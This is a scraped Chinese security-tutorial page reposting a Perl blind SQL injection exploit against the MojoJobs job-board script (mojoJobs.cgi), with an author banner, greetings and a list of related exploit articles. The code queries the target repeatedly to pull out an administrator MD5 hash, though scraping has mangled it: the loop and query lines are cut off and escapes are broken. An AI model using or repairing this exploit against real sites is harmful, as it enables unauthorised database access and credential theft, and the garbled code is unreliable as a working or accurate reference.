手机
当前位置:查字典教程网 >电脑 >电脑安全教程 >MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit
摘要:#!/usr/bin/perluseLWP::UserAgent;useGetopt::Long;if(!$ARGV[1]){print"n...

#!/usr/bin/perl

use LWP::UserAgent;

use Getopt::Long;

if(!$ARGV[1])

{

print " n";

print " #################### Viva IslaMe Viva IslaMe ################n";

print " # MojoJobs Blind SQL Injection Exploit #n";

print " # (mojoJobs.cgi mojo ) #n";

print " # Author: Mr.SQL #n";

print " # EMAIL : SQL@HOTMAIL.IT #n";

print " # #n";

print " # -((:: GrE3E3E3E3E3ETZ ::))- #n";

print " # #n";

print " # HaCkEr_EGy :: His0k4 :: Dark MaSTer :: MoHaMaD AL 3rab #n";

print " # :: ALwHeD :: milw0rm :: #n";

print " # #n";

print " # MuSliMs HaCkErS #n";

print " # #n";

print " # HOME: WwW.PaL- #n";

print " # #n";

print " # Usage : perl test.pl host #n";

print " # Example: perl test.pl / -d 10 #n";

print " # Options: #n";

print " # -d valid cat_a value #n";

print " #############################################################n";

exit;

}

my $host = $ARGV[0];

my $cat_a = $ARGV[2];

my %options = ();

GetOptions(%options, "u=i", "p=s", "d=i");

print "[~] Exploiting...n";

if($options{"b"})

{

$mojo = $options{"b"};

}

syswrite(STDOUT, "[~] MD5-Hash: ", 14);

for(my $i = 1; $i get($query);

my $content = $resp->content;

my $regexp = "tourterms.pdf";

if($content =~ /$regexp/)

{

return 1;

}

else

{

return 0;

}

}

【MojoJobs (mojoJobs.cgi mojo) Blind SQL Injection Exploit】相关文章:

实现端口安全的几种机制

终端技巧 终端机常见绕过沙盘方法

phpDatingClub (website.php page) Local File Inclusion Vulnerability

IntelliTamper 2.07 HTTP Header Remote Code Execution Exploit

如何保护内网安全

Wysi Wiki Wyg 1.0 (index.php c) Local File Inclusion Vulnerability

瑞星防火墙V16:可自定义防火墙规则

BYOD需要更具时效性的网络安全防护策略

Arctic Issue Tracker 2.0.0 (index.php filter) SQL Injection Exploit

gapicms 9.0.2 (dirDepth) Remote File Inclusion Vulnerability

精品推荐
分类导航